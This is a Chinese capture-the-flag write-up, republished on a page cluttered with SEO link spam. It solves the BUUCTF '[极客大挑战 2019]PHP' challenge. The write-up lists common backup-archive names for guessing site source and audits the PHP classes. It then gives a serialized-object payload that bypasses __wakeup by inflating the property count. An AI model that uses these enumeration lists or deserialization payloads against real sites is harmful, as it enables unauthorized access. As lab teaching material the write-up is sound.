当前位置: 首页 > wzjs >正文

外贸网站建设有哪些要求网店如何营销推广

wzjs 2025/7/28 17:50:45
外贸网站建设有哪些要求,网店如何营销推广,php网站安装图解,做网站麻烦不题目来源:BUUCTF [极客大挑战 2019]PHP 目录 一、打开靶机,整理信息 二、解题思路 step 1:目录扫描、爆破 step 2:代码审计 1.index.php 2.class.php 3.flag.php step 3:绕过__wakeup重置 ​编辑 三、小结…

题目来源:BUUCTF  [极客大挑战 2019]PHP

目录

一、打开靶机,整理信息

二、解题思路

step 1:目录扫描、爆破

step 2:代码审计

1.index.php

2.class.php

3.flag.php

step 3:绕过__wakeup重置

​编辑

三、小结

一、打开靶机,整理信息

        根据题目名称php,以及页面的备份网站的提示,这里应该有下载备份文件,里面应该有php文件要进行代码审计

二、解题思路

step 1:目录扫描、爆破

目录扫描文件太多了,找不到有用信息,可以尝试输入网站源码备份文件,看看能不能碰对

常见的网站源码备份文件后缀:

tar、tgz、zip、rar、bak、7z

常见的网站源码备份文件名:

web、website、backup、back、www、wwwroot、temp

爆破一下

        url传参看看,得到一个压缩文件夹,点进去得到一堆源码文件

        整理一下进行代码审计

step 2:代码审计

1.index.php

index.php主要是设计,有用信息已经摘抄了

<?phpinclude 'class.php';$select = $_GET['select'];$res=unserialize(@$select);?>

        文件包含class.php文件,并且是GET传参,参数为select,然后将其进行反序列化

2.class.php

<?php
include 'flag.php';error_reporting(0);class Name{//设置两个私有变量private $username = 'nonono';private $password = 'yesyes';//利用__construct构造函数,在创建对象时初始化$username和$password属性public function __construct($username,$password){$this->username = $username;$this->password = $password;}//当对象被反序列化时,__wakeup方法会被自动调用,将$username重置为guestfunction __wakeup(){$this->username = 'guest';}//当对象被销毁时,__destruct方法会被自动调用function __destruct(){if ($this->password != 100) {  //检查password是否等于100echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {  //如果password等于100,则进一步检查username是否等于admin,等于则输出flagglobal $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
?>

代码总结:要想输出flag信息,就要绕过__wakeup重置,并且password要等于100,username要等于admin

3.flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

        什么也不是

step 3:绕过__wakeup重置

        根据上面代码审计结果,用脚本得到payload,脚本来源:[极客大挑战 2019]PHP 1_php 在线挑战-CSDN博客

<?php
class Name{private $username = 'admin';private $password = '100';
}
$select = new Name();
$res=serialize(@$select);
echo $res
?>

序列化结果有未显示字符,另外绕过wakeup方法要让成员属性数目大于实际数目

当成员属性数目大于实际数目时可绕过wakeup方法

        所以要将序列化结果中的2改为3,将未显示字符变为%00,再传参

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

        得到flag

三、小结

1.常见的网站源码备份文件后缀:

tar、tgz、zip、rar、bak、7z

常见的网站源码备份文件名:

web、website、backup、back、www、wwwroot、temp

2.当成员属性数目大于实际数目时可绕过wakeup方法

http://www.dtcms.com/wzjs/128933.html

相关文章:

  • WordPress 文章最多字潍坊seo培训
  • 网站开发与建设课程设计阿里关键词排名查询
  • 昆明本地网站深圳优化公司样高粱seo
  • 陕西网站建设的内容莆田seo
  • php网站怎么做301跳转关键词搜索排名查询
  • 有没有做奥数题的网站seo优化工作有哪些
  • 网站建设添加视频百度一下搜索网页
  • 想自己建个网站怎么样才能引流客人进店
  • 黄岛区做网站的怎么在百度上做广告推广
  • wordpress非插件幻灯片seo百度贴吧
  • 中国建设银行吉林分行网站商务网站建设
  • 门户网站建设管理情况自查报告什么是搜索引擎竞价推广
  • 网站建设公司盈利企业营销型网站有哪些
  • 网站运营的作用厦门网站搜索引擎优化
  • 如何使用家里电脑做网站服务器查询关键词排名工具
  • 网站设计一般多少钱网页设计作品
  • 群晖 wordpress 端口品牌seo培训
  • 做微信公众号必备的网站潜江seo
  • 网站正在建设中 源码下载长沙网站优化方法
  • 网站做查赚钱合肥网络优化公司有几家
  • 免费网站模做引流推广的平台600
  • 做网站用jsp还是html免费广州seo
  • 深圳中装建设集团整站优化关键词排名
  • wordpress 清空 demo深圳搜索引擎优化seo
  • 生物科技公司网站建设公司网站制作
  • wordpress设置上传文件大小限制优化seo软件
  • 商务网站建设实验记录短视频营销推广
  • b2c网站建设 广州公众号怎么做文章推广
  • 唐山玉田网站建设百度指数分析官网
  • 做民宿怎么登录网站一级域名生成二级域名